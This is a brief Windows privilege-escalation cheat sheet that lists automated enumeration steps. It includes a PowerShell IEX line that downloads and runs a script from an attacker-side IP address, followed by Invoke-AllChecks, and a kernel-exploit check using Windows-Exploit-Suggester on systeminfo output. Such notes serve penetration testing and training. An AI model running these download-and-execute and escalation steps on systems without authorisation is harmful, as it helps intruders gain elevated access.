Automated Tools

# Misconfigurations
IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/up.ps1');
Invoke-AllChecks -Format List;
Invoke-AllChecks -HTMLReport;

# Kernel Exploits
systeminfo > systeminfo.txt
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -d 2014-06-06-mssb.xlsx -i systeminfo.txt

Last updated